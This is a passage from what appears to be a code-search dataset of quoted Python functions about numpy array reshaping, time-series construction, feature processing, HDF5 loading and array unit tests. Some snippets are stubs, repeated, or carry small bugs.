dtype = 'int32') #because tm_max is zeo based indexing\n for i in range(sflat_arr.shape[0]):\n for j in range(len(sflat[i])):\n for k in range(sflat_arr.shape[2]):\n sflat_arr[i, j, k] = sflat[i][j][k]\n return sflat_arr",
"def array(self):",
"def np_collapse_freq_into_time(x):\n if x.ndim == 4:\n return np.reshape(x, [x.shape[0], x.shape[1] * x.shape[2], -1])\n return np.reshape(x, [x.shape[0], x.shape[1] * x.shape[2]])",
"def trans(array,dim):\n return array[filter(lambda x: x != dim,range(len(array)) ) ]",
"def one_dim(a: cython.double[:]):\n a[0] *= 2\n return a[0], a.ndim",
"def a_subarray_in_the_idle_state():",
"def _is_1d_harray(arr):\r\n return len(arr.shape) < 2 or arr.shape[0] == 1",
"def _np_apply_along_axis(func1d, axis: int, arr: np.ndarray) -> np.ndarray:\n\n assert arr.ndim == 2\n assert axis in [0, 1]\n\n if axis == 0:\n result = np.empty(arr.shape[1])\n for i in range(len(result)):\n result[i] = func1d(arr[:, i])\n return result\n\n result = np.empty(arr.shape[0])\n for i in range(len(result)):\n result[i] = func1d(arr[i, :])\n\n return result",
"def process(self, mat):",
"def matrix_test(subject_array, side_length, typeII_error, typeI_error, sq_repeat = 1 ,ind_repeat = 1, seq = True):\n\n\n\n matrix_test_num = len(subject_array)//(side_length**2)\n matrix_test_array = subject_array[0:matrix_test_num*side_length**2, :]\n ind_test_array = subject_array[matrix_test_num*side_length**2:, :]\n \n ind_idx = []\n \n for temp_batch in np.array_split(matrix_test_array, matrix_test_num):\n temp_batch = temp_batch.reshape(side_length, side_length, 2)\n temp_row = []\n temp_col = []\n random_num_row = np.random.uniform(0, 1, sq_repeat)\n random_num_col = np.random.uniform(0, 1, sq_repeat)\n for i in range(side_length):\n if 1 in (temp_batch[i,:,1]):\n if max(random_num_row) > typeII_error:\n temp_row.append(temp_batch[i,:,0])\n else:\n if min(random_num_row) < typeI_error:\n temp_row.append(temp_batch[i, :, 0])\n if 1 in (temp_batch[:,i,1]):\n if max(random_num_col) > typeII_error:\n temp_col.append(temp_batch[:,i,0])\n else:\n if min(random_num_col) < typeI_error:\n temp_col.append(temp_batch[:, i, 0])\n ind_idx.append(np.intersect1d(temp_row, temp_col))\n\n ind_idx = np.concatenate(ind_idx)\n ind_idx = ind_idx.astype('int')\n \n if len(ind_idx) == 0:\n neg_array = matrix_test_array\n else:\n mask = np.zeros(subject_array.shape[0], dtype = bool)\n mask[ind_idx] = True\n mask[matrix_test_num*side_length**2:] = True\n ind_test_array = subject_array[mask,:]\n \n \n neg_array = subject_array[~mask, :]\n \n\n \n \n neg_array[:, 1] = 0\n \n ind_test, ind_con = conventional_test(ind_test_array,\n typeII_error, typeI_error, repeat = ind_repeat, seq = seq)\n \n \n \n batch_test_num = matrix_test_num * 2 * side_length * sq_repeat\n result = np.concatenate((neg_array, ind_test))\n result = result[result[:, 0].argsort()]\n \n return (result, batch_test_num + ind_con, ind_con)",
"def funcify_3d(arrayin, func2d):\r\n assert(len(arrayin.shape) >= 2)\r\n elem = arrayin.size / (arrayin.shape[-1] * arrayin.shape[-2])\r\n if elem == 2 :\r\n arrayout = func2d(arrayin)\r\n else :\r\n array = arrayin.flatten().reshape( (elem, arrayin.shape[-2], arrayin.shape[-1]))\r\n arrayout = []\r\n for i in range(elem):\r\n arrayout.append(func2d(array[i]))\r\n arrayout = np.array(arrayout).reshape( arrayin.shape )\r\n return arrayout",
"def build_timeseries(mat, y_col_index):\n # total number of time-series samples would be len(mat) - TIME_STEPS\n dim_0 = mat.shape[0] - TIME_STEPS #determine number of inputs that have an output because you'll not have data timesteps forward once your index goes past len(mat.shape[0]) - TIME_STEPS\n dim_1 = mat.shape[1] #number of columns in dataset\n x = np.zeros((dim_0, TIME_STEPS, dim_1)) #create an array with dimensions of viable inputs, the time step, the cols in the dataset\n y = np.zeros((dim_0,)) #create an array length of viable inputs\n\n for i in range(dim_0): #for each viable input\n x[i] = mat[i:TIME_STEPS+i] #set the input array to a set of data the length of a timestep\n y[i] = mat[TIME_STEPS+i, y_col_index] #set output array that correalates with inout array to that data located in the y_col_index of the data\n #print(\"length of time-series i/o\",x.shape,y.shape)\n return x, y",
"def num_43():\n \n def block(a, r=3, cs=3, row_order=True):\n \"\"\"Block slice an array using a window of (rs, cs) size\n \"\"\"\n lenr = a.shape[0]//rs\n lenc = a.shape[1]//cs\n if row_order:\n iter = [(i, j) for (i, j) in np.ndindex(lenr, lenc)]\n else:\n iter = [(j, i) for (i, j) in np.ndindex(lenr, lenc)]\n b = np.array([a[i*rs:(i+1)*rs, j*cs:(j+1)*cs] for (i,j) in iter])\n #b = np.array([a[i*rs:(i+1)*rs, j*cs:(j+1)*cs] \n # for (i, j) in np.ndindex(lenr, lenc)])\n return b\n r = 6\n c = 6\n a = np.arange(r*c).reshape(r, c)\n vs = np.array(np.vsplit(a, 2))\n hs = np.array(np.hsplit(a, 2))\n #a.squeeze(axis=(2,3))\n rs = 3\n cs = 4\n #lenr = a.shape[0]//rs\n #lenc = a.shape[1]//cs\n #b = np.array([a[i*rs:(i+1)*rs, j*cs:(j+1)*cs] \n # for (i, j) in np.ndindex(lenr, lenc)])\n #b1 = np.array([a[i*rs:(i+1)*rs, j*cs:(j+1)*cs] \n # for (j, i) in np.ndindex(lenr, lenc)])\n e = block(a, 3, 4, row_first=False)\n b = block(a, rs, cs, True)\n b1 = block(a, rs, cs, False)\n c = np.array([np.vsplit(i, 2) for i in np.hsplit(a, 2)])\n d = np.array([np.hsplit(i, 2) for i in np.vsplit(a, 2)])\n #c = c.reshape(lenr*lenc, rs, cs) \n return a, b, b1, c, d, e",
"def victorylap(array):\n for i in range(0, array.len()):\n array.peek(i, False, True, 0.01) # Run it slower",
"def test_TimeArray_convert_unit():",
"def sf01(arr):\n s = arr.shape\n return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])",
"def sf01(arr):\n s = arr.shape\n return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])",
"def sf01(arr):\n s = arr.shape\n return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])",
"def sf01(arr):\n s = arr.shape\n return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])",
"def resetTimeSinceLastIntegration(subarray=DEFAULT) :\n multiSubarray('resetTimeSinceLastIntegration', subarray)",
"def return_iterated_array_result(self, iterated_array: Array2D) -> Array2D:\r\n\r\n iterated_array_1d = array_2d_util.array_2d_slim_from(\r\n mask_2d=self.mask, array_2d_native=iterated_array, sub_size=1\r\n )\r\n\r\n return Array2D(values=iterated_array_1d, mask=self.mask.derive_mask.sub_1)",
"def test_hk_getdata_timeline_array_type(self):\n _, timelines = load_data(self._file)\n assert isinstance(timelines['group0']['t'], np.ndarray)",
"def steppify(arr, axis='x'):\n\t\n\tif axis == 'x':\n\t\tnewarr = np.r_[arr[0], np.dstack((arr[1:], arr[1:])).flatten()]\n\t\n\telif axis == 'y':\n\t\tnewarr = np.r_[np.dstack((arr[:-1], arr[:-1])).flatten(), arr[-1]]\n\t\n\telse:\n\t\tprint('your axes in steppify are improperly identified')\n\n\treturn newarr",
"def feature_processing(array2d):\n new_array2d = np.zeros([array2d.shape[0], 29])\n # items/ orders\n new_array2d[:, 0] = array2d[:, 4] / array2d[:, 3]\n # cancels / orders\n new_array2d[:, 1] = array2d[:, 5] / array2d[:, 3]\n # returns / items\n new_array2d[:, 2] = array2d[:, 6] / array2d[:, 4]\n # voucher / orders\n new_array2d[:, 3] = array2d[:, 10] / array2d[:, 3]\n # female_items / female_items + male_items\n new_array2d[:, 4] = array2d[:, 15] / ([1 if x == 0 else x for x in (array2d[:, 15] + array2d[:, 16])])\n # male_items / female_items + male_items\n new_array2d[:, 5] = array2d[:, 16] / ([1 if x == 0 else x for x in (array2d[:, 15] + array2d[:, 16])])\n # unisex_items / items\n new_array2d[:, 6] = array2d[:, 17] / array2d[:, 4]\n # wapp_items / items\n new_array2d[:, 7] = array2d[:, 18] / array2d[:, 4]\n # wftw_items / items\n new_array2d[:, 8] = array2d[:, 19] / array2d[:, 4]\n # mapp_items / items\n new_array2d[:, 9] = array2d[:, 20] / array2d[:, 4]\n # wacc_items / items\n new_array2d[:, 10] = array2d[:, 21] / array2d[:, 4]\n # macc_items / items\n new_array2d[:, 11] = array2d[:, 22] / array2d[:, 4]\n # mftw_items / items\n new_array2d[:, 12] = array2d[:, 23] / array2d[:, 4]\n # wspt_items / items\n new_array2d[:, 13] = array2d[:, 24] / array2d[:, 4]\n # mspt_items / items\n new_array2d[:, 14] = array2d[:, 25] / array2d[:, 4]\n # curvy_items / items\n # Curvy item has a strong correlation with gender, however they are very right-skewed use np.power(1/6) to smooth it\n new_array2d[:, 15] = np.power(array2d[:, 26] / array2d[:, 4], 1 / 6)\n # sacc_items / items\n new_array2d[:, 16] = array2d[:, 27] / array2d[:, 4]\n # msite_orders / orders\n new_array2d[:, 17] = array2d[:, 28] / array2d[:, 3]\n # desktop_orders / orders\n new_array2d[:, 18] = array2d[:, 29] / array2d[:, 3]\n # android_orders / orders\n new_array2d[:, 19] = array2d[:, 30] / array2d[:, 3]\n # ios_orders / orders\n new_array2d[:, 20] = array2d[:, 31] / array2d[:, 3]\n # other_device_orders / orders\n new_array2d[:, 21] = array2d[:, 32] / array2d[:, 3]\n # work_orders / orders\n new_array2d[:, 22] = array2d[:, 33] / array2d[:, 3]\n # home_orders / orders\n new_array2d[:, 23] = array2d[:, 34] / array2d[:, 3]\n # parcelpoint_orders / orders\n new_array2d[:, 24] = array2d[:, 35] / array2d[:, 3]\n # other_collection_orders / orders\n new_array2d[:, 25] = array2d[:, 36] / array2d[:, 3]\n # average_discount_onoffer\n new_array2d[:, 26] = array2d[:, 39]\n # average_discount_used\n new_array2d[:, 27] = array2d[:, 40]\n # revenue / order\n new_array2d[:, 28] = array2d[:, 41] / array2d[:, 3]\n\n # normalize by each feature\n new_array2d = normalize(new_array2d, axis=0, norm='max')\n return new_array2d",
"def IterRows(a: numpy.ndarray) -> t.Iterable[numpy.ndarray]:\n for row in a:\n return row[:, numpy.newaxis]",
"def data(self, arr):\n self.bitmap(arr, 1)",
"def solution(array):\n rows = array.shape[0]\n cols = array.shape[1]\n result = np.ones((rows,cols))\n result[1:rows-1,1:cols-1] = 0\n return result",
"def flatten_npar(np_array):\n \n itr = len(np_array)\n start = np_array[0]\n \n for i in range(1,itr):\n start = np.hstack((start,np_array[i]))\n \n return(np.array(start))",
"def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if out_arr.shape != (3,):\n out_arr = out_arr.view(np.ndarray)\n return out_arr",
"def array_input(f):\n @wraps(f)\n def wrapped(self, t):\n t = np.atleast_1d(t)\n r = f(self, t)\n return r\n return wrapped",
"def _check_input_timeseries(x: np.ndarray) -> np.ndarray:\n if not isinstance(x, np.ndarray):\n raise ValueError(\"The input time series must be a numpy array.\")\n if x.ndim <= 0 or x.ndim >= 4:\n raise ValueError(\n \"The input time series must have more than 0 dimensions and\"\n \"less than 4 dimensions.\"\n )\n if x.ndim == 3:\n return x[0]\n return x",
"def double(arr):\n newarr = np.array([(xx,xx) for xx in arr]).ravel()\n return newarr",
"def test__chk_asarray(self):\r\n\r\n exp = (array([[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]), 0)\r\n obs = _chk_asarray([[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]], 0)\r\n assert_almost_equal(obs[0], exp[0])\r\n self.assertEqual(obs[1], exp[1])",
"def create_array( n ):",
"def sampling(self,arr):\n H=0\n W=0\n if arr.shape[0]%2 == 0:\n H = arr.shape[0]/2\n else:\n H = 1+arr.shape[0]/2\n\n if arr.shape[1]%2 == 0:\n W = arr.shape[1]/2\n else:\n W = 1+arr.shape[1]/2\n \n new_arr = numpy.zeros((H,W),dtype = numpy.int)\n for i in range(H):\n for j in range(W):\n new_arr[i][j] = arr[2*i][2*j]\n return new_arr",
"def assure_2d(array):\n array = np.array(array, copy=False, subok=True, ndmin=1)\n if array.ndim == 2:\n return array\n elif array.ndim == 1:\n return array[:, np.newaxis]\n else:\n raise RuntimeError(\"Array must be 1 or 2 dimensional.\")",
"def test_array(self):\n htype = h5t.py_create(('f',(2,2)))\n self.assertIsInstance(htype, h5t.TypeArrayID)\n self.assertEqual(htype.get_array_dims(), (2,2))",
"def sum1(arr_in):\n assert arr_in.ndim == 2\n assert arr_in.dtype == 'float32'\n n_rows, n_cols = map(int, arr_in.shape)\n arr_in = np.asarray(arr_in)\n arr_out = np.empty(n_rows, dtype=arr_in.dtype)\n code = r\"\"\"\n int i, j;\n float sum;\n omp_set_num_threads(8);\n #pragma omp parallel for default(shared) private(j)\n for(j=0; j<n_rows; ++j) {\n sum = 0;\n //#pragma omp parallel for default(shared) private(i) reduction(+:sum)\n for(i=0; i<n_cols; ++i)\n sum += arr_in[j*n_cols + i];\n arr_out[j] = sum;\n }\n \"\"\"\n weave.inline(\n code,\n ['arr_in','arr_out','n_rows', 'n_cols'],\n extra_compile_args=[\n \"-fopenmp\",\n \"-pthread\",\n \"-O6\",\n \"-march=native\",\n \"-mtune=native\",\n \"-funroll-all-loops\",\n \"-fomit-frame-pointer\",\n \"-march=native\",\n \"-mtune=native\",\n \"-msse4\",\n \"-ftree-vectorize\",\n \"-ftree-vectorizer-verbose=5\",\n \"-ffast-math\",\n \"-ftree-loop-distribution\",\n \"-funroll-loops\",\n \"-ftracer\",\n\n ],\n verbose=2,\n support_code = \\\n r\"\"\"\n #include <stdio.h>\n #include <omp.h>\n #include <math.h>\n \"\"\",\n libraries=['gomp'])\n return arr_out",
"def iterate_over_celestial_slices(array_in, array_out, wcs):\n\n # First put lng/lat as first two dimensions in WCS/last two in Numpy\n if wcs.wcs.lng == 0 and wcs.wcs.lat == 1:\n array_in_view = array_in\n array_out_view = array_out\n elif wcs.wcs.lng == 1 and wcs.wcs.lat == 0:\n array_in_view = array_in.swapaxes(-1, -2)\n array_out_view = array_out.swapaxes(-1, -2)\n else:\n array_in_view = array_in.swapaxes(-2, -1 - wcs.wcs.lat).swapaxes(-1, -1 - wcs.wcs.lng)\n array_out_view = array_out.swapaxes(-2, -1 - wcs.wcs.lat).swapaxes(-1, -1 - wcs.wcs.lng)\n\n # Flatten remaining dimensions to make it easier to loop over\n from operator import mul\n\n nx_in = array_in_view.shape[-1]\n ny_in = array_in_view.shape[-2]\n n_remaining_in = reduce(mul, array_in_view.shape, 1) // nx_in // ny_in\n\n nx_out = array_out_view.shape[-1]\n ny_out = array_out_view.shape[-2]\n n_remaining_out = reduce(mul, array_out_view.shape, 1) // nx_out // ny_out\n\n if n_remaining_in != n_remaining_out:\n raise ValueError(\"Number of non-celestial elements should match\")\n\n array_in_view = array_in_view.reshape(n_remaining_in, ny_in, nx_in)\n array_out_view = array_out_view.reshape(n_remaining_out, ny_out, nx_out)\n\n for slice_index in range(n_remaining_in):\n yield array_in_view[slice_index], array_out_view[slice_index]",
"def Repeater(arr,n):\n new_arr = np.zeros((arr.shape[0]*n,arr.shape[1]),dtype=object)\n for i in range(0,arr.shape[0]):\n new_row = np.tile(arr[i,:],(n,1))\n new_arr[i*n:(i+1)*n,:] = new_row\n return new_arr",
"def two_dim(a: cython.double[:,:]):\n a[0,0] *= 3\n return a[0,0], a[0,1], a.ndim",
"def identity( array ):\n return _myarray.identity( array )",
"def test_TimeArray_repr():",
"def test_reference_to_array(self):\n arr = numpy.arange(0.0, 10.0, 0.1)\n arr = numpy.reshape(arr, (25, 4))\n vtk_arr = array_handler.array2vtk(arr)\n arr1 = array_handler.vtk2array(vtk_arr)\n # Now make sure these are using the same memory.\n arr[0][0] = 100.0\n self.assertEqual(arr[0][0], arr1[0][0])\n self.assertEqual(arr.shape, arr1.shape)",
"def test_arr2cell_array(self):\n # Test list of lists.\n a = [[0], [1, 2], [3, 4, 5], [6, 7, 8, 9]]\n cells = array_handler.array2vtkCellArray(a)\n z = numpy.array([1, 0, 2, 1,2, 3, 3,4,5, 4, 6,7,8,9])\n arr = array_handler.vtk2array(cells.GetData())\n self.assertEqual(numpy.sum(arr - z), 0)\n self.assertEqual(len(arr.shape), 1)\n self.assertEqual(len(arr), 14)\n\n # Test if optional argument stuff also works.\n cells = vtk.vtkCellArray()\n ident = id(cells)\n cells = array_handler.array2vtkCellArray(a, cells)\n self.assertEqual(id(cells), ident)\n arr = array_handler.vtk2array(cells.GetData())\n self.assertEqual(numpy.sum(arr - z), 0)\n self.assertEqual(cells.GetNumberOfCells(), 4)\n\n # Make sure this resets the cell array and does not add to the\n # existing list!\n cells = array_handler.array2vtkCellArray(a, cells)\n self.assertEqual(cells.GetNumberOfCells(), 4)\n\n # Test Numeric array handling.\n N = 3\n a = numpy.zeros((N,3), numpy.int)\n a[:,1] = 1\n a[:,2] = 2\n cells = array_handler.array2vtkCellArray(a)\n arr = array_handler.vtk2array(cells.GetData())\n expect = numpy.array([3, 0, 1, 2]*3, numpy.int) \n self.assertEqual(numpy.alltrue(numpy.equal(arr, expect)),\n True)\n self.assertEqual(cells.GetNumberOfCells(), N)\n\n # Test if a list of Numeric arrays of different cell lengths works.\n l_a = [a[:,:1], a, a[:2,:2]]\n cells = array_handler.array2vtkCellArray(l_a)\n arr = array_handler.vtk2array(cells.GetData())\n expect = numpy.array([1, 0]*3 + [3, 0, 1, 2]*3 + [2, 0,1]*2, numpy.int)\n self.assertEqual(numpy.alltrue(numpy.equal(arr, expect)),\n True)\n self.assertEqual(cells.GetNumberOfCells(), N*2 + 2)\n\n # This should not take a long while. This merely tests if a\n # million cells can be created rapidly.\n N = int(1e6)\n a = numpy.zeros((N,3), numpy.int)\n a[:,1] = 1\n a[:,2] = 2\n cells = array_handler.array2vtkCellArray(a)\n self.assertEqual(cells.GetNumberOfCells(), N)",
"def n2m(a):\n if not isinstance(a, np.ndarray): a = np.array(a)\n return multiprocessing.Array(a.dtype.char, a.flat, lock=False), tuple(a.shape), a.dtype.char, isinstance(a, np.matrix)",
"def test06(self):\n a = np.arange(1e5)\n b = bcolz.carray(a, chunklen=10000, rootdir=self.rootdir)\n sl = -2 # second last element\n # print \"b[sl]->\", `b[sl]`\n assert_array_equal(a[sl], b[sl], \"Arrays are not equal\")\n sl = -1 # last element\n # print \"b[sl]->\", `b[sl]`\n assert_array_equal(a[sl], b[sl], \"Arrays are not equal\")",
"def wrap(array):\n\t\t\t\n\t\t\tassert array.ndim == 2, ('works on 2D arrays only; expecting '\n\t\t\t\t\t\t\t\t\t 'self.cond_tuning, which should be 2D')\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\treturn np.column_stack((array, array[..., 0]))",
"def extract_into_tensor(arr, timesteps, broadcast_shape):\n device = timesteps.device\n assert arr.device == device\n res = arr[timesteps].float()\n new_dims = [1] * (len(broadcast_shape) - res.ndim)\n res = res.view(*res.shape, *new_dims)\n return torch.broadcast_to(res, broadcast_shape)",
"def time_delay_embed(array, dimension, time_dif):\r\n emb = array.values # Converts the panda dataframe to an array\r\n emb = np.squeeze(np.asarray(emb)) # Make a 1-d array of all values\r\n i = len(emb) - 1 # sets up a counter\r\n new_vec = [] # target for each row\r\n embed = [] # target for full set\r\n while i >= dimension-1:\r\n a = 0 # the dimensional counter\r\n b = 0 # time_dif counter\r\n while a< dimension:\r\n new_vec.append(emb[i-b])\r\n a+=1\r\n b+= time_dif\r\n embed.append(new_vec)\r\n new_vec = []\r\n i -=1\r\n \r\n X = np.array(embed)\r\n \r\n return np.flipud(X)",
"def numpy_to_cube(np_array, similar_cube, dimensions):\n\n new_cube = iris.cube.Cube.copy(similar_cube) # copy similar cube\n\n # time, lat, lon\n if dimensions == 3:\n new_cube.data[:,:,:] = np.nan # convert new cube entries to nan\n new_cube.data[:,:,:] = np_array # fill with numpy array data\n\n # lat, lon\n elif dimensions == 2:\n new_cube.data[:,:] = np.nan # convert new cube entries to nan\n new_cube.data[:,:] = np_array # fill with numpy array data\n\n # either time, lat or lon only\n elif dimensions == 1:\n new_cube.data[:] = np.nan # convert new cube entries to nan\n new_cube.data[:] = np_array # fill with numpy array data\n\n # return the numpy array, failed to convert to a cube\n else:\n print('failed to convert')\n new_cube = np_array\n\n return new_cube",
"def check_array(arr: Arrayable) -> np.ndarray:\n if isinstance(arr, np.ndarray):\n return arr\n return np.array(arr)",
"def test_nrows_gtiff_array(self):\n self.assertEqual(_test_array(landsat_gtiff).shape[1], 224)",
"def dataArr(filename):\r\n #Open the file\r\n f=h5py.File(filename,'r')\r\n \r\n #Initialize the data arrays\r\n cdata=[]\r\n idxset=[]\r\n vertices=[]\r\n \r\n #Open groups in the file\r\n for group in f.keys():\r\n# print('Group- '+group)\r\n \r\n #Get the group\r\n currGroup=f[group]\r\n \r\n #Open keys in the group\r\n for key in currGroup.keys():\r\n# print('Key- '+key)\r\n \r\n #Append the data to the respective arrays\r\n if key=='cdata(Complex)':\r\n cdataGroup=currGroup[key]\r\n \r\n imag=[]\r\n real=[]\r\n #Open the keys in cdata\r\n for subkey in cdataGroup.keys():\r\n# print('Subkey- '+subkey)\r\n \r\n #Get the real and imaginary parts of the array\r\n if subkey=='Imag':\r\n imag=cdataGroup[subkey][()]\r\n elif subkey=='Real':\r\n real=cdataGroup[subkey][()]\r\n \r\n #Convert lists to numpy arrays\r\n imag=np.array(imag)\r\n real=np.array(real)\r\n #Get the cdata value\r\n cdata=real+1j*imag\r\n \r\n elif key=='idxset':\r\n idxset=currGroup[key][()]\r\n elif key=='vertices':\r\n vertices=currGroup[key][()]\r\n \r\n #Remove the y component from the vertices\r\n xVals=[]\r\n yVals=[]\r\n newVertices=[]\r\n for vertex in vertices:\r\n xVals.append(vertex[0])\r\n yVals.append(vertex[2])\r\n newVertices.append([vertex[0],vertex[1]])\r\n vertices=newVertices\r\n \r\n #Convert to numpy arrays\r\n cdata=np.array(cdata)\r\n xVals=np.array(xVals)\r\n yVals=np.array(yVals)\r\n \r\n #Close the file\r\n f.close()\r\n \r\n return cdata, xVals, yVals",
"def arrayManipulation_brute(n, queries):\n arr = [0] * n\n\n for i, row in enumerate(queries):\n a, b, k = row[0], row[1], row[2]\n for j in range(a - 1, b):\n arr[j] = arr[j] + k\n print(f'array size {arr.__sizeof__()/1000000}')\n return max(arr)",
"def ns_tarray_to_sFlat2(t_arr, DEPTH = 2):\n sflat = []\n tm, tm_max, dep = 0, 0, 0\n lis = t_arr.tolist()\n for i in range(t_arr.shape[0]):\n ctime, aflag = -1, False\n sflat.append([])\n sflat[i].append([0 for _ in range(DEPTH)])\n \n tm, dep = -1, 0 # tm -1 initiator\n \n st_arr = sorted(lis[i], key=lambda x: x[0] if x[0] != 0 else sys.maxsize)\n\n t_arr = numpy.array([st_arr])\n\n for j in range(t_arr.shape[1]):\n if dep == DEPTH: \n dep = 0\n # tm += 1\n # sflat[i].append([0 for _ in range(SPREAD)])\n if ctime == t_arr[i, j, 0] and dep == 0: \n continue\n elif ctime != t_arr[i, j, 0]:\n sflat[i].append([0 for _ in range(DEPTH)])\n tm += 1\n dep = 0\n\n sflat[i][tm][dep] = int(t_arr[i, j, 1])\n ctime = t_arr[i, j, 0]\n dep += 1\n \n tm_max = max([len(v) for v in sflat])\n \n #triming the array\n sflat_arr = numpy.zeros((t_arr.shape[0], tm_max + 1, DEPTH), dtype = 'int32') #because tm_max is zeo based indexing\n for i in range(sflat_arr.shape[0]):\n for j in range(len(sflat[i])):\n for k in range(sflat_arr.shape[2]):\n sflat_arr[i, j, k] = sflat[i][j][k]\n return sflat_arr",
"def dataArr(filename):\r\n #Open the file\r\n f=h5py.File(filename,'r')\r\n \r\n #Initialize the data arrays\r\n cdata=[]\r\n idxset=[]\r\n vertices=[]\r\n \r\n #Open groups in the file\r\n for group in f.keys():\r\n# print('Group- '+group)\r\n \r\n #Get the group\r\n currGroup=f[group]\r\n \r\n #Open keys in the group\r\n for key in currGroup.keys():\r\n# print('Key- '+key)\r\n \r\n #Append the data to the respective arrays\r\n if key=='cdata(Complex)':\r\n cdataGroup=currGroup[key]\r\n \r\n imag=[]\r\n real=[]\r\n #Open the keys in cdata\r\n for subkey in cdataGroup.keys():\r\n# print('Subkey- '+subkey)\r\n \r\n #Get the real and imaginary parts of the array\r\n if subkey=='Imag':\r\n imag=cdataGroup[subkey][()]\r\n elif subkey=='Real':\r\n real=cdataGroup[subkey][()]\r\n \r\n #Convert lists to numpy arrays\r\n imag=np.array(imag)\r\n real=np.array(real)\r\n #Get the cdata value\r\n cdata=real+1j*imag\r\n \r\n elif key=='idxset':\r\n idxset=currGroup[key][()]\r\n elif key=='vertices':\r\n vertices=currGroup[key][()]\r\n \r\n #Remove the z component from the vertices\r\n xVals=[]\r\n yVals=[]\r\n newVertices=[]\r\n for vertex in vertices:\r\n xVals.append(vertex[0])\r\n yVals.append(vertex[1])\r\n newVertices.append([vertex[0],vertex[1]])\r\n vertices=newVertices\r\n \r\n #Convert to numpy arrays\r\n cdata=np.array(cdata)\r\n xVals=np.array(xVals)\r\n yVals=np.array(yVals)\r\n \r\n #Close the file\r\n f.close()\r\n \r\n return cdata, xVals, yVals",
"def numpy_basics():\n # a) tworzenie macierzy\n X = np.zeros([3,3]) # macierz 0\n print np.array([[1.1]]) #tworzenie macierzy z listy python\n Y = np.eye(3,3) # macierz jednostkowa\n X[0,0] = 10.0 # ustawienie elementu\n print \"Array dimensions \",X.shape #wymiar macierzy\n\n # b) dodawanie macierzowe\n print (X+Y)\n\n # c) mnozenie macierzowe\n print np.dot(X,Y)\n\n # d) pobieranie elementow\n print X[1,1] #element X_22\n print X[1,:] #caly drugi wiersz, zwraca tez np.array\n\n # e) w kazdym wierszu najwiekszy element macierzy X+Y\n #TODO: fill in\n print (X+Y).max(axis=1) # \"zjadamy\" 2 wymiar, czyli kolumny",
"def test02(self):\n dtype = np.dtype(\"f4,f8\")\n a = np.ones(30000, dtype=dtype)\n ac = bcolz.carray(a, dtype=dtype)\n self.assertTrue(ac.dtype == dtype)\n self.assertTrue(a.dtype == ac.dtype)\n # print \"ac-->\", `ac`\n assert_array_equal(a, ac[:], \"Arrays are not equal\")",
"def test_empty(self):\n a = np.ones((3, 4, 5))\n ai = np.ones((3, 0, 5), dtype=np.intp)\n\n actual = take_along_axis(a, ai, axis=1)\n assert_equal(actual.shape, ai.shape)",
"def flatten_array(arr):\n flat_array = []\n for item in arr:\n if isinstance(item, (list, tuple, set, np.ndarray)):\n flat_array.extend(flatten_array(item))\n else:\n flat_array.append(item)\n return np.array(flat_array)",
"def twoDize(array, width):\n count = 0\n output = []\n temp = []\n while len(array) > 0:\n temp.append(array.pop())\n if len(temp) == width:\n output.append(temp)\n temp = []\n return output",
"def test02(self):\n a = np.arange(self.N, dtype='uint64')\n b = bcolz.carray(a, rootdir=self.rootdir)\n c = iter(b.view())\n u = c.iter(3)\n w = b.iter(2)\n self.assertEqual(sum(a[3:]), sum(u))\n self.assertEqual(sum(a[2:]), sum(w))",
"def test_integer_split_2D_default(self):\n a = array([arange(10),arange(10)])\n res = array_split(a,3)\n desired = [array([arange(10)]),array([arange(10)]),array([])]\n compare_results(res,desired)",
"def __call__(self, batch: base.Batch, key: base.RngKey) -> base.Array:",
"def array (self, length, width):\n\t\treturn [[0 for i in range(width)] for j in range(length)] #List comprehensions (Works like two for loops)",
"def iterated_array_from(\r\n self, func: Callable, cls: object, array_lower_sub_2d: Array2D\r\n ) -> Array2D:\r\n\r\n if not np.any(array_lower_sub_2d):\r\n return array_lower_sub_2d.slim\r\n\r\n iterated_array = np.zeros(shape=self.shape_native)\r\n\r\n threshold_mask_lower_sub = self.mask\r\n\r\n for sub_size in self.sub_steps[:-1]:\r\n array_higher_sub = self.array_at_sub_size_from(\r\n func=func, cls=cls, mask=threshold_mask_lower_sub, sub_size=sub_size\r\n )\r\n\r\n try:\r\n threshold_mask_higher_sub = self.threshold_mask_via_arrays_from(\r\n array_lower_sub_2d=array_lower_sub_2d,\r\n array_higher_sub_2d=array_higher_sub,\r\n )\r\n\r\n iterated_array = self.iterated_array_jit_from(\r\n iterated_array=iterated_array,\r\n threshold_mask_higher_sub=threshold_mask_higher_sub,\r\n threshold_mask_lower_sub=threshold_mask_lower_sub,\r\n array_higher_sub_2d=array_higher_sub,\r\n )\r\n\r\n except ZeroDivisionError:\r\n return self.return_iterated_array_result(iterated_array=iterated_array)\r\n\r\n if threshold_mask_higher_sub.is_all_true:\r\n return self.return_iterated_array_result(iterated_array=iterated_array)\r\n\r\n array_lower_sub_2d = array_higher_sub\r\n threshold_mask_lower_sub = threshold_mask_higher_sub\r\n\r\n array_higher_sub = self.array_at_sub_size_from(\r\n func=func,\r\n cls=cls,\r\n mask=threshold_mask_lower_sub,\r\n sub_size=self.sub_steps[-1],\r\n )\r\n\r\n iterated_array_2d = iterated_array + array_higher_sub.binned.native\r\n\r\n return self.return_iterated_array_result(iterated_array=iterated_array_2d)",
"def build_timeseries(mat, TIME_STEPS, y_col_index = None):\n dim_0 = mat.shape[0] - TIME_STEPS\n D = mat.shape[1]\n x = np.zeros((dim_0, TIME_STEPS, D))\n if y_col_index:\n y = np.zeros((dim_0, ))\n else:\n y = np.zeros((dim_0, D))\n \n for i in range(dim_0):\n x[i] = mat[i:TIME_STEPS+i]\n if y_col_index:\n y[i] = mat[TIME_STEPS + i, y_col_index]\n else:\n y[i] = mat[TIME_STEPS + i, :]\n\n print(\"length of time-series i/o\",x.shape,y.shape)\n return x, y",
"def _frz(a):\n if a.ndim == 0:\n a.shape = (1,)\n return a",
"def vectorized(self):\n return False",
"def _share_array(arr_np, typecode_or_type):\n\n arr = mp.RawArray(typecode_or_type, arr_np.ravel())\n return arr, arr_np.shape",
